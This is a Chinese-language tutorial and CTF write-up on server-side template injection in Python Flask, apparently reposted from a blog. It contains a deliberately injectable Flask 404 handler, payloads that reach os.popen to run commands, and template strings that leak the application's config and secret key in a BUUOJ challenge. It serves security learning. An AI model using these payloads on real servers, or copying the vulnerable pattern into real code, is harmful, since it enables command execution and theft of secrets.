SSTI模板注入讲解与真题实操

0x00 SSTI

1.什么是SSTI注入?
SSTI模板注入(Server-Side Template Injection),通过与服务端模板的 输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的。

2.造成的原因与利用条件
网站由数据与模板框架处理输出页面,我们的数据在数据库不会改变,但是画面的模板可以转换多样,不同的模板可以给人不同的视觉感受,但是当模板存在可控的参数变量或模板代码内有模板的调试功能,可能会导致ssti模板注入,争对大多数脚本类型均存在该注入。常见为python的CTF考点较多

3.危害有哪些?
可造成文件读取,命令执行,代码执行等
paylaod解析参考:

SSTI模板注入讲解与真题实操

; 0x01 案例理解SSTI

敏感函数词组:
flask
render_template_string

Python案例:

from flask import Flask
from flask import request
from flask import config
from flask import render_template_string
app = Flask(__name__)

app.config['SECRET_KEY'] = "flag{SSTI_123456}"
@app.route('/')
def hello_world():
    return 'Hello World!'

@app.errorhandler(404)
def page_not_found(e):
    template = '''
{%% block body %%}
    <div class="center-content error">
        <h1>Oops! That page doesn't exist.</h1>
        <h3>%s</h3>     #%s&#x83B7;&#x53D6;404_url&#x53C2;&#x6570;&#x4E0B;&#x5217;&#x5B57;&#x6BB5;&#x5185;&#x5BB9;&#xFF0C;&#x4ECE;&#x800C;&#x8F93;&#x5165;&#x53EF;&#x63A7;&#x53D8;&#x91CF;&#x6CE8;&#x5165;
    </div>
{%% endblock %%}
''' % (request.args.get('404_url'))
    return render_template_string(template), 404

if __name__ == '__main__':
    app.run(host='0.0.0.0',debug=True)

可被python脚本执行,存在注入

SSTI模板注入讲解与真题实操
通过payload类型,可RCE进行文件的读取与对本机等操作等
os._wrap_close&#x7C7B;&#x91CC;&#x6709;popen&#x3002;
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('whoami').read()
"".__class__.__bases__[0].__subclasses__()[128].__init__.__globals__.popen('whoami').read()

0x02 CTF案例

https://buuoj.cn/

SSTI模板注入讲解与真题实操
题目页面:

SSTI模板注入讲解与真题实操
构造2-2执行,说明存在ssti注入执行
SSTI模板注入讲解与真题实操
查看所有的全局变量,参考全局变量
SSTI模板注入讲解与真题实操
利用全局变量获取当前应用下面的config值

url_for()函数是用于构建操作指定函数的URL
get_flashed_messages()函数是获取传递过来的数据

&#x83B7;&#x53D6;&#x5168;&#x5C40;&#x53D8;&#x91CF;
/shrine/{{url_for.__globals__}}
&#x6216;
/shrine/{{get_flashed_messages.__globals__}}
&#x5229;&#x5F53;&#x524D;&#x7684;&#x5168;&#x5C40;&#x53D8;&#x91CF;&#x8BFB;&#x53D6;&#xFF1A;
/shrine/{{url_for.__globals__['current_app'].config}}
&#x6216;
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

SSTI模板注入讲解与真题实操

补充: pyc的反编译知识点

pyc也是一种脚本封装的形式,类似于
aspx:DLL文件
java:.class/jar/war文件
pyc是一种可反编译的封装,也有反编译难度大的pyd等文件
pyc反编译参考网站:
反编译平台:
https://tool.lu/pyc/
http://tools.bugscaner.com/decompyle/
反编译工具:https://github.com/wibiti/uncompyle2

Original: https://blog.csdn.net/qq_53577336/article/details/122902171
Author: 告白热
Title: SSTI模板注入讲解与真题实操

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/745903/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)

大家都在看

亲爱的 Coder【最近整理,可免费获取】👉 最新必读书单  | 👏 面试题下载  | 🌎 免费的AI知识星球